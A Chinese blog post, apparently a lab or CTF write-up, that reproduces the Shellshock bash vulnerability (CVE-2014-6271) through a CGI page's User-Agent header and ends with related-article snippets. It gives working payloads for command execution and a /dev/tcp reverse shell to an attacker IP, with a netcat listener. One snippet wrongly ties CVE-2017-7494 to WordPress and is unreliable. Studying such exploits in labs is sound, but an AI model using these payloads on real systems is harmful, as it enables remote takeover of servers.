Shellshock-破壳漏洞bash命令执行 CVE-2014-6271

最新推荐文章于 2024-05-28 13:53:41 发布
最新推荐文章于 2024-05-28 13:53:41 发布
阅读量1.5k 收藏 4
点赞数
文章标签: bash linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47536169/article/details/126576965
版权

影响版本

标志:GNU Bash <= 4.3

shelshocke简介

  • shellshock即unix 系统下的bash shell的一个漏洞,Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统。

漏洞成因:

  • bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。
  • 执行CGI 时会调用Bash将Referer、host、UserAgent、header等作为环境变量进行处理

漏洞复现

(1)访问页面:

 

 

(2)利用过程:

User-Agent: () { :;};echo ;echo $(/bin/ls -al); #列出bin目录下所有文件

 

 

反弹shell

User-Agent: () { :;};echo ; /bin/bash -i >& /dev/tcp/192.168.111.181/12345 0>&1; 
#192.168.111.181为攻击机的ip
#攻击机监听12345端口,等待服务器解析完恶意代码,接受反弹回来的shell

 

nc -lvvp 12345

 

bash-4.3$ whomai
bash-4.3$ ls

 

 

cd /tmp              #拿flag:flag-{bmh93c08202-4584-4bdd-9aae-59fd613510e8}
#成功通过

 

 

爱码⑩
关注
CVE-2014-6271破壳漏洞(cgi-bin)
墨痕诉清风的博客
07-19 2634
CVE-2014-6271(即“破壳漏洞)广泛存在与GNUBash版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。该漏洞利用条件较多,1.bash版本小于等于4.3,2.攻击者可以控制环境变量,3.新的bash进程被打开触发漏洞执行命令。简单点说,没有cgi脚本继承环境变量,就玩不了;有cgi脚本的,bash版本过高也玩不了。catecho;do";};......
详细的漏洞复现:Shellshock CVE-2014-6271 CVE-2014-7169
dongchijue7318的博客
09-11 1478
目录 前言 漏洞原理 利用方式 复现过程 1. 环境准备 (1) 为容器配置固定IP地址 (2) 查看bash版本 2. 本地验证:测试镜像系统是否存在漏洞 3. 远程模拟验证(原理验证) ...
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 465
Shellshock远程命令注入
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 3164
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
Bash Bug(破壳漏洞Shellshock) - CVE-2014-6271
HaSaKing的博客
05-28 706
破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
Shellshock远程命令注入 CVE-2014-6271 漏洞复现
ADummy的博客
03-04 789
Shellshock远程命令注入(CVE-2014-6271) by ADummy 0x00利用路线 ​ Burpsuite发包—>命令执行 0x01漏洞介绍 ​ CVE-2014-6271(即“破壳漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口 0x 02漏洞复现 当您访问时,http://your-ip/您应该看到两个文件: saf
Shellshock 远程命令注入 (CVE-2014-6271漏洞复现
weixin_56537388的博客
11-09 170
Safe.cgi 由最新版本的 bash 生成,victim.cgi 是 bash4.3 生成的页面,容易受到 shellshock 的影响。我们可以在访问 victim.cgi 时在用户代理字符串中发送包含我们的有效负载,并且命令成功执行
破壳漏洞(CVE-2014-6271)综合分析1
08-04
破壳漏洞(CVE-2014-6271)综合分析】 一、威胁卡片 破壳漏洞,也称为Bash Shellshock,是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发现的。这个漏洞被赋予了CVE编号CVE-2014-6271,属于A级威胁响应...
CVE-2014-6271破壳漏洞利用过程
D-river博客
11-12 9145
前言CVE-2014-6271(即“破壳漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
Shellshock破壳)系列漏洞简要分析及检测
Traxer的学习之路
03-13 4540
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
bash(CVE-2014-6271) shellshock-破壳漏洞复现
weixin_45095113的博客
01-03 552
bash(CVE-2014-6271) shellshock-破壳漏洞复现
【pwnable.kr】 shellshock
weixin_30284355的博客
07-05 120
pwnable从入门到放弃,第五题。 ssh shellshock@pwnable.kr -p2222 (pw:guest) 这题主要涉及了一个关于bashCVE漏洞。 首先还是下载源代码审计一下,shellshock.c #include <stdio.h> int main(){ setresuid(getegid(), getegid()...
vulhub漏洞复现之bashShellshock CVE-2014-6271
weixin_43071873的博客
11-27 1268
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
Shellshock
qq_39249347的博客
07-05 886
shell函数 在操作系统中,shell程序是一个命令解释器,他从终端窗口或控制台读取并执行命令shell提供了用户和操作系统之间的接口。 目前存在着许多种不同类型的shell,包括sh(Bourne shell)、bash(Bource-again shell)、csh(C shell)、zsh(Z shell)和Windows PowerShell等。 BashLinux操作系统中最受欢迎的shell程序之一,Bash中的Shellshock漏洞与内部定义的函数有关,这些函数被称为shell函数。
Bash破壳漏洞(CVE-2014-6271)
n5xxxx__zy的博客
07-16 324
##0x00 漏洞范围: GNU Bash 版本小于等于4.3 漏洞成因: bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。 漏洞危害: Apache充当媒介用CGI...
Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路
热门推荐
Exploit的小站~
05-10 3万+
 今日爆出一个Bash的RCE漏洞,威力巨大。看了看老外的分析,觉得有必要写一写自己对这个漏洞的理解。 首先,问题起因于一个命令ENV。 原型: env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...] Man是这么说的: Display, set, or remove environment variables,Run a comm...
【安全】Shellshock漏洞
01-30 467
Shellshock利用了linux环境变量解析问题,进而可以进行针对正常应用启动shell时进行劫持。通过该漏洞,可以实现CGI环境下的RCE,以及针对特权应用的提权。 可以简单理解为,当环境变量可控时,均存在攻击场景。如此看来,该漏洞危害极大,攻击场景非常广。
Bash(shellshock)
chocomoss的博客
11-30 260
影响 漏洞影响:GNU Bash <= 4.3 启动服务器 搭建:docker-compose up -d 查看:docker-compose ps 抵达网站 抓包拦截 User-Agent: () { :;};echo ; echo; echo $(/bin/ls /); 反弹shell:User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.118.1/4444 0>&1; ...
shellshock_Shellshock Bash漏洞
culin0274的博客
08-11 212
shellshockShellshock is a vulnerability that has been discovered in Bash, which you are likely to know as the command line interface that you use to manage your Linux server through SSH. On a compromi...
cve-2017-7494
最新发布
06-13
CVE-2017-7494是一个知名的网络安全漏洞,它影响的是WordPress平台的一个插件,具体来说是"Layered Tech Marketing Platform"插件中的一个安全漏洞。这个漏洞被称为"Shellshock(波加莱尔)"或"BASH bug",源于LinuxBash shell的一个设计缺陷。 漏洞利用了当Web服务器接收到包含恶意参数的HTTP请求时,会执行恶意的shell命令,因为Bash shell没有正确处理环境变量中的特殊符号。攻击者可以通过精心构造的URL触发这个漏洞,从而在服务器上执行任意代码,可能导致数据泄露、权限提升或整个服务器的控制权被接管。 解决这个问题的方法通常包括更新WordPress和受影响的插件到最新版本,修复或禁用存在漏洞的部分,并强化服务器安全配置,例如限制环境变量的使用或者关闭不必要的服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值